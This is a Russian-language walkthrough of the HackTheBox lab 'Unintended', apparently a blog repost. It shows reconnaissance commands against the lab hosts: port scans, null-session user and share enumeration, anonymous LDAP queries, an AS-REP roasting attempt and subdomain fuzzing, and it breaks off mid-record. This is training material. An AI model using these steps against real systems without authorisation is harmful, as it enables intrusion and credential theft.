{"id":481643,"date":"2026-05-29T18:40:12","date_gmt":"2026-05-29T18:40:12","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=481643"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=481643","title":{"rendered":"HackTheBox. \u041f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 Mini Pro Lab Unintended"},"content":{"rendered":"<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<p>\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f <strong>Unintended<\/strong> \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043f\u0435\u0440\u0435\u0432\u0435\u043b\u0430 \u0441\u0432\u043e\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u043d\u0430 <strong>Active<\/strong> <strong>Directory<\/strong>. \u0420\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u043e\u0431\u0435\u0441\u043f\u043e\u043a\u043e\u0435\u043d\u043e \u0442\u0435\u043c, \u0447\u0442\u043e \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0438 \u0443\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0438\u0437 \u0432\u0438\u0434\u0443 \u043e\u0448\u0438\u0431\u043a\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043c\u043e\u0433\u0443\u0442 \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0441\u0440\u0435\u0434\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0439 \u0434\u043b\u044f \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0443\u0433\u0440\u043e\u0437. \u0412\u0430\u0448\u0435\u0439 \u0444\u0438\u0440\u043c\u0435 \u043f\u043e\u0440\u0443\u0447\u0435\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0441 \u0446\u0435\u043b\u044c\u044e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u044f, \u043c\u043e\u0436\u0435\u0442 \u043b\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043e\u0442 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044e \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u043e\u043c.<\/p>\n<p><strong>Unintended<\/strong> \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043e\u043f\u044b\u0442 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u043e\u0448\u0438\u0431\u043e\u043a \u043f\u0440\u0438 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0438 <strong>Active<\/strong> <strong>Directory<\/strong>, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044f, \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f \u043c\u0435\u0436\u0434\u0443 \u0441\u043b\u0443\u0436\u0431\u0430\u043c\u0438 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439. \u041c\u0430\u0448\u0438\u043d\u0430 \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 <strong>Linux<\/strong> \u0441 \u043f\u0443\u0442\u044f\u043c\u0438 \u0430\u0442\u0430\u043a \u043d\u0430 <strong>Active<\/strong> <strong>Directory<\/strong>, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0435\u0451 \u0446\u0435\u043d\u043d\u043e\u0439 \u043f\u043b\u043e\u0449\u0430\u0434\u043a\u043e\u0439 \u0434\u043b\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0438 \u043a\u0430\u043a \u0434\u043b\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u043e\u0432 \u043f\u043e \u043d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0439, \u0442\u0430\u043a \u0438 \u043f\u043e \u043e\u0431\u043e\u0440\u043e\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.<\/p>\n<p><strong>Unintended<\/strong> \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0430 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0445\u043e\u0447\u0435\u0442 \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u0437\u043d\u0430\u043d\u0438\u044f \u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 <strong>Active<\/strong> <strong>Directory<\/strong> \u0432 \u0441\u0440\u0435\u0434\u0435, \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u043d\u0430 <strong>Linux<\/strong>. \u041c\u0430\u0448\u0438\u043d\u0430 \u0445\u043e\u0440\u043e\u0448\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u0434\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u0445\u043e\u0447\u0435\u0442 \u043f\u043e\u043d\u044f\u0442\u044c \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0432 \u0433\u0438\u0431\u0440\u0438\u0434\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435.<\/p>\n<p>\u0412 \u044d\u0442\u043e\u0439 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 <strong>Red<\/strong> <strong>Team<\/strong> <strong>Operator<\/strong> \u0443\u0440\u043e\u0432\u043d\u044f <strong>I<\/strong> \u0438\u0433\u0440\u043e\u043a\u0438 \u0441\u0442\u043e\u043b\u043a\u043d\u0443\u0442\u0441\u044f \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c\u0438 \u0442\u0435\u043c\u0430\u043c\u0438:<\/p>\n<p>&#8212; \u041f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435 \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u0445 \u043a\u043e\u043f\u0438\u0439 <strong>Active<\/strong> <strong>Directory<\/strong><\/p>\n<p>&#8212; \u0411\u043e\u043a\u043e\u0432\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435<\/p>\n<p>&#8212; \u041f\u0438\u0432\u043e\u0442\u0438\u043d\u0433<\/p>\n<p>&#8212; \u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 <strong>Linux<\/strong><\/p>\n<p>&#8212; \u041a\u0440\u0438\u043c\u0438\u043d\u0430\u043b\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u0445 \u043a\u043e\u043f\u0438\u0439<\/p>\n<p>&#8212; \u0410\u0442\u0430\u043a\u0438 \u043d\u0430 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f<\/p>\n<p> \u041f\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043d\u0430\u043c \u0434\u0430\u043d\u044b <strong>3<\/strong> \u0430\u0439\u043f\u0438 \u0430\u0434\u0440\u0435\u0441\u0430.<\/p>\n<p><strong>10.13.38.57<\/strong><\/p>\n<p><strong>10.13.38.58<\/strong><\/p>\n<p><strong>10.13.38.59<\/strong><\/p>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u0447\u0442\u043e \u043e\u043d\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b.<\/p>\n<p><strong>ping -c 1 10.13.38.57 | grep ttl<\/strong><\/p>\n<p><strong>ping -c 1 10.13.38.58 | grep ttl<\/strong><\/p>\n<p><strong>ping -c 1 10.13.38.59 | grep ttl<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/36e\/136\/7dd\/36e1367dd7f947bf34ae4919c5d22491.png\" width=\"481\" height=\"207\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/36e\/136\/7dd\/36e1367dd7f947bf34ae4919c5d22491.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/36e\/136\/7dd\/36e1367dd7f947bf34ae4919c5d22491.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0440\u0442\u044b \u043d\u0430 \u044d\u0442\u0438\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445.  <\/p>\n<p><strong>sudo masscan -p1-65535,U:1-65535 10.13.38.57 &#8212;rate=500 -e tun0 &gt; unintended.57<\/strong><\/p>\n<p><strong>sudo masscan -p1-65535,U:1-65535 10.13.38.58 &#8212;rate=500 -e tun0 &gt; unintended.58<\/strong><\/p>\n<p><strong>sudo masscan -p1-65535,U:1-65535 10.13.38.59 &#8212;rate=500 -e tun0 &gt; unintended.59<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cac\/e91\/931\/cace91931e34cad63de787e9942fd967.png\" width=\"372\" height=\"267\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/cac\/e91\/931\/cace91931e34cad63de787e9942fd967.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cac\/e91\/931\/cace91931e34cad63de787e9942fd967.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b62\/581\/ce1\/b62581ce110a2376433ba6b8d20e48da.png\" width=\"343\" height=\"61\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b62\/581\/ce1\/b62581ce110a2376433ba6b8d20e48da.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b62\/581\/ce1\/b62581ce110a2376433ba6b8d20e48da.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cf6\/8fe\/563\/cf68fe5637680f9c81558139d74c1c90.png\" width=\"361\" height=\"58\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/cf6\/8fe\/563\/cf68fe5637680f9c81558139d74c1c90.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/cf6\/8fe\/563\/cf68fe5637680f9c81558139d74c1c90.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0440\u0442\u044b \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e <strong>nmap<\/strong>\u043e\u043c.<\/p>\n<p><strong>nmap -p22,53,88,135,139,389,445,464,636,3268,3269,49152,49153,49154 -sC -sV -oA nmap\/unintended.57 10.13.38.57<\/strong><\/p>\n<p><strong>nmap -p21,22 -sC -sV -oA nmap\/unintended.58 10.13.38.58<\/strong><\/p>\n<p><strong>nmap -p22,80 -sC -sV -oA nmap\/unintended.59 10.13.38.59<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5b2\/b60\/4b1\/5b2b604b18f7dfb9d80af39119e3c338.png\" width=\"1106\" height=\"663\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/5b2\/b60\/4b1\/5b2b604b18f7dfb9d80af39119e3c338.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5b2\/b60\/4b1\/5b2b604b18f7dfb9d80af39119e3c338.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/848\/6cc\/cdf\/8486cccdf9d1cef183a35a35579d75c3.png\" width=\"762\" height=\"394\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/848\/6cc\/cdf\/8486cccdf9d1cef183a35a35579d75c3.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/848\/6cc\/cdf\/8486cccdf9d1cef183a35a35579d75c3.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/6ee\/630\/25c\/6ee63025c3c6cee1a0a06fad5baafc56.png\" width=\"762\" height=\"268\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/6ee\/630\/25c\/6ee63025c3c6cee1a0a06fad5baafc56.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/6ee\/630\/25c\/6ee63025c3c6cee1a0a06fad5baafc56.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041a\u0430\u043a \u0432\u0438\u0434\u043d\u043e \u0438\u0437 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0441\u043a\u0430\u043d\u0430, \u043d\u0430\u0448 \u0434\u043e\u043c\u0435\u043d \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f <strong>unintended.vl<\/strong>, \u0430 \u0438\u043c\u044f \u043c\u0430\u0448\u0438\u043d\u044b <strong>dc<\/strong>.<\/p>\n<p>\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043c \u044d\u0442\u0443 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0432 \u0444\u0430\u0439\u043b <strong>hosts<\/strong>.  <\/p>\n<p><strong>sudo nano \/etc\/hosts<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4cd\/9a8\/6c1\/4cd9a86c17d1272c4168c13b6c90f0fc.png\" width=\"431\" height=\"97\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/4cd\/9a8\/6c1\/4cd9a86c17d1272c4168c13b6c90f0fc.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4cd\/9a8\/6c1\/4cd9a86c17d1272c4168c13b6c90f0fc.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0415\u0441\u043b\u0438 \u043f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u043d\u0430 \u0432\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 <strong>10.13.38.59 <\/strong>\u0442\u043e \u0443\u0432\u0438\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eca\/814\/a79\/eca814a794e3b11708f89fa5c44ceb9e.png\" width=\"1151\" height=\"642\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/eca\/814\/a79\/eca814a794e3b11708f89fa5c44ceb9e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eca\/814\/a79\/eca814a794e3b11708f89fa5c44ceb9e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0430\u0441 \u043f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0437\u0430\u0433\u043b\u0443\u0448\u043a\u0430.<\/p>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0434\u043e\u043c\u0435\u043d \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u043d\u0430 \u043d\u0443\u043b\u0435\u0432\u0443\u044e \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e.<\/p>\n<p><strong>netexec smb 10.13.38.57 -u &#187; -p &#187; &#8212;users<\/strong><\/p>\n<p>\u0418\u043b\u0438 \u0447\u0435\u0440\u0435\u0437 <strong>RPC<\/strong>.<\/p>\n<p><strong>rpcclient -U &#187; -N 10.13.38.57 -c enumdomusers | cut -d'[&#8216; -f2 | cut -d&#8217;]&#8217; -f1<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/778\/1d2\/89a\/7781d289a338632bde1ef7e7bb9f3d4a.png\" width=\"1098\" height=\"247\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/778\/1d2\/89a\/7781d289a338632bde1ef7e7bb9f3d4a.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/778\/1d2\/89a\/7781d289a338632bde1ef7e7bb9f3d4a.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0438\u043c\u0435\u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0434\u0430\u0432\u0430\u0439\u0442\u0435 \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043c \u0438\u0445 \u0432 \u0444\u0430\u0439\u043b <strong>users.txt<\/strong>.<\/p>\n<p><strong>nano users.txt<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/0aa\/00f\/fd9\/0aa00ffd9fc3663406d7e58451c177be.png\" width=\"157\" height=\"65\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/0aa\/00f\/fd9\/0aa00ffd9fc3663406d7e58451c177be.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/0aa\/00f\/fd9\/0aa00ffd9fc3663406d7e58451c177be.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0422\u0430\u043a\u0436\u0435 <strong>nmap<\/strong> \u0441\u043a\u0430\u0437\u0430\u043b \u043d\u0430\u043c, \u0447\u0442\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u0430\u044f \u043f\u0440\u0438\u0432\u044f\u0437\u043a\u0430 <strong>LDAP<\/strong> \u2014 \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u044f.<\/p>\n<p>\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0438\u043c <strong>LDAP<\/strong>.  <\/p>\n<p><strong>ldapsearch -H ldap:\/\/dc.unintended.vl -x -LLL -s base<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/76e\/91e\/159\/76e91e15988d0d31f1fb1b6b48ecd50d.png\" width=\"653\" height=\"341\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/76e\/91e\/159\/76e91e15988d0d31f1fb1b6b48ecd50d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/76e\/91e\/159\/76e91e15988d0d31f1fb1b6b48ecd50d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p> \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e:<\/p>\n<p> \u0414\u043e\u043c\u0435\u043d \u2014 <strong>unintended.vl<\/strong><\/p>\n<p> \u041a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 &#8212; <strong>dc.unintended.vl<\/strong> (\u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u0430\u044f \u0443\u0447\u0451\u0442\u043a\u0430: <strong>dc$<\/strong>)<\/p>\n<p> \u0422\u0438\u043f &#8212; <strong>Samba<\/strong> <strong>AD<\/strong> (\u043d\u0435 <strong>Windows<\/strong>)<\/p>\n<p> \u0424\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c  &#8212;<strong>2008<\/strong> <strong>R2<\/strong> (\u0443\u0440\u043e\u0432\u0435\u043d\u044c <strong>4<\/strong>)<\/p>\n<p> \u0410\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f &#8212; <strong>NTLM<\/strong>, <strong>Kerberos<\/strong> (<strong>GSSAPI<\/strong>\/<strong>SPNEGO<\/strong>)<\/p>\n<p> \u0420\u0435\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u044f &#8212; \u0412\u043a\u043b\u044e\u0447\u0435\u043d\u0430, \u0441\u0435\u0440\u0432\u0435\u0440 \u2014 <strong>Global<\/strong> <strong>Catalog<\/strong><\/p>\n<p> \u0410\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c &#8212; \u041e\u0447\u0435\u043d\u044c \u043d\u0438\u0437\u043a\u0430\u044f (<strong>USN<\/strong>=<strong>4488<\/strong>)<\/p>\n<p> <strong>LDAP<\/strong> <strong>Controls<\/strong>  &#8212; \u041f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u043f\u0430\u0433\u0438\u043d\u0430\u0446\u0438\u0438, \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043f\u0440\u0430\u0432, \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f<\/p>\n<p> \u0414\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u0440\u0430\u0437\u0434\u0435\u043b\u044b &#8212; <strong>5<\/strong> \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u043e\u0432 (\u0434\u043e\u043c\u0435\u043d, \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f, \u0441\u0445\u0435\u043c\u0430, \u0434\u0432\u0435 <strong>DNS<\/strong>-\u0437\u043e\u043d\u044b)<\/p>\n<p>\u041c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0438\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b.<\/p>\n<p><strong>netexec smb 10.13.38.57 -u &#187; -p &#187; &#8212;shares<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eb5\/679\/350\/eb56793505b2781fc89dab47480c651a.png\" width=\"1095\" height=\"183\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/eb5\/679\/350\/eb56793505b2781fc89dab47480c651a.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eb5\/679\/350\/eb56793505b2781fc89dab47480c651a.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0415\u0441\u0442\u044c \u043e\u0431\u0449\u0438\u0439 \u0440\u0435\u0441\u0443\u0440\u0441 <strong>home<\/strong>, \u043d\u043e \u043e\u043d \u043d\u0430\u043c \u043f\u043e\u043a\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d.<\/p>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 <strong>ASREProast<\/strong>.<\/p>\n<p><strong>impacket-GetNPUsers -usersfile users.txt  unintended.vl\/<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a15\/d4e\/597\/a15d4e5978c2feda18fdb2ef22623bf4.png\" width=\"458\" height=\"103\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/a15\/d4e\/597\/a15d4e5978c2feda18fdb2ef22623bf4.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a15\/d4e\/597\/a15d4e5978c2feda18fdb2ef22623bf4.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u043e \u043d\u0443\u0436\u043d\u044b\u0445 \u0444\u043b\u0430\u0433\u043e\u0432 \u043d\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e.<\/p>\n<p>\u041f\u0440\u043e\u0432\u0435\u0434\u0435\u043c \u0444\u0430\u0437\u0437\u0438\u043d\u0433 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u043e\u0432.<\/p>\n<p><strong>ffuf -u <\/strong><a href=\"http:\/\/10.13.38.59\/\" rel=\"noopener noreferrer nofollow\"><strong>http:\/\/10.13.38.59\/<\/strong><\/a><strong> -H &#8216;Host: FUZZ.unintended.vl&#8217; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -mc all -ac<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/253\/579\/192\/2535791921410cac6d76053c14115e98.png\" width=\"768\" height=\"101\" 